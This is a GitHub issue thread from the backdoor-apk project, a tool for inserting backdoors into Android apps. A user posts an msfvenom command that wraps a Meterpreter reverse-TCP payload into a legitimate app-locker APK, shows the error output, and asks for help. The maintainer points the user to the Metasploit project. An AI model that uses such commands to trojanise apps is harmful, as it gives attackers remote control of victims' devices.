dana-at-cp / backdoor-apk

backdoor-apk is a shell script that simplifies the process of adding a backdoor to any Android APK file. Users of this shell script should have working knowledge of Linux, Bash, Metasploit, Apktool, the Android SDK, smali, etc. This shell script is provided as-is without warranty of any kind and is intended for educational purposes only.
Apache License 2.0
2.17k stars 699 forks source link

unable to find hookpoint of applock.apk #142

Closed shreyasbadachi closed 5 years ago

shreyasbadachi commented 6 years ago

root@Hacker:~/Desktop# msfvenom -x applock-2-6-7.apk -p android/meterpreter/reverse_tcp LHOST=192.168.43.25 LPORT=4444 -o applockloded.apk Using APK template: applock-2-6-7.apk No platform was selected, choosing Msf::Module::Platform::Android from the payload No Arch selected, selecting Arch: dalvik from the payload [] Creating signing key and keystore.. [] Decompiling original APK.. [] Decompiling payload APK.. [] Locating hook point.. Error: Unable to find hook point in /tmp/d20180630-3922-qw5crn/original/smali*/com/domobile/applock/AppLockApplication.smali ,,,,,,,,,,,,,

PLEASE SOLVE MY PROBLEM

dana-at-cp commented 5 years ago

@shreyasbadachi Haha! I originally didn't notice that you submitted an issue for msfvenom. I don't support the Metasploit project directly. Try the rapid7/Metasploit github repos.